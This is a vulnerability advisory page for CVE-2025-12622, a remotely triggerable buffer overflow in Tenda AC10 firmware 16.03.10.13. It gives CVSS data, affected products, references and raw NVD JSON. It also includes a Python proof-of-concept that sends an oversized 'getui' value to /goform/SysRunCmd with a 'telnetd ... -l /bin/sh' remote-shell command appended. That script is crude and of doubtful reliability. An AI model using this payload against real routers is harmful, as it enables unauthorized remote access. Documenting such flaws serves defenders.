CVE-2025-12622

Description

A vulnerability was determined in Tenda AC10 16.03.10.13. Affected by this vulnerability is the function formSysRunCmd of the file /goform/SysRunCmd. This manipulation of the argument getui causes buffer overflow. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:ac10_firmware:16.03.10.13:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tenda:ac10:4.0:*:*:*:*:*:*:* - NOT VULNERABLE

Tenda AC10 firmware <= 16.03.10.13

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-12622 PoC - Tenda AC10 Buffer Overflow in /goform/SysRunCmd
# Target: Tenda AC10 router with firmware 16.03.10.13

TARGET_IP = "192.168.0.1"  # Default router IP
TARGET_PORT = 80
PAYLOAD_SIZE = 1000  # Overflow payload size

def exploit_cve_2025_12622():
    """
    Exploit for CVE-2025-12622
    The vulnerability exists in formSysRunCmd function at /goform/SysRunCmd
    The getui parameter is vulnerable to buffer overflow
    """
    target_url = f"http://{TARGET_IP}:{TARGET_PORT}/goform/SysRunCmd"
    
    # Construct malicious payload for buffer overflow
    # This payload should overflow the buffer in getui parameter
    overflow_payload = "A" * PAYLOAD_SIZE
    
    # For actual exploitation, replace with shellcode or ROP gadgets
    # Example command injection after overflow:
    cmd_payload = "telnetd -p 8888 -l /bin/sh"
    
    data = {
        "getui": overflow_payload + cmd_payload,
        "cmd": "ls"
    }
    
    try:
        response = requests.post(target_url, data=data, timeout=10)
        print(f"[*] Request sent to {target_url}")
        print(f"[*] Response status: {response.status_code}")
        print(f"[*] Response length: {len(response.text)}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None

if __name__ == "__main__":
    print("CVE-2025-12622 PoC - Tenda AC10 Buffer Overflow")
    exploit_cve_2025_12622()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12622
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12622
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12622/
[4] VulDB https://vuldb.com/cve/CVE-2025-12622
[5] https://pan.baidu.com/s/1Jl1zy5niigg1XYm8ZCh_Lg
[6] https://vuldb.com/?ctiid.330914
[7] https://vuldb.com/?id.330914
[8] https://vuldb.com/?submit.678889
[9] https://www.tenda.com.cn/
[10] https://www.yuque.com/ba1ma0-an29k/nnxoap/rg8eug0zk8ep3zne?singleDoc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12622", "sourceIdentifier": "[email protected]", "published": "2025-11-03T08:15:33.640", "lastModified": "2025-11-05T14:34:51.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Tenda AC10 16.03.10.13. Affected by this vulnerability is the function formSysRunCmd of the file /goform/SysRunCmd. This manipulation of the argument getui causes buffer overflow. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ac10_firmware:16.03.10.13:*:*:*:*:*:*:*", "matchCriteriaId": "6F1C8715-D7B4-4D1A-9E90-079C72049332"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ac10:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "970AEBF4-2B32-4633-A75B-2D2C598C048D"}]}]}], "references": [{"url": "https://pan.baidu.com/s/1Jl1zy5niigg1XYm8ZCh_Lg", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://vuldb.com/?ctiid.330914", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.330914", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.678889", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.yuque.com/ba1ma0-an29k/nnxoap/rg8eug0zk8ep3zne?singleDoc", "source": "[email protected]", "tags": ["Permiss ... (truncated)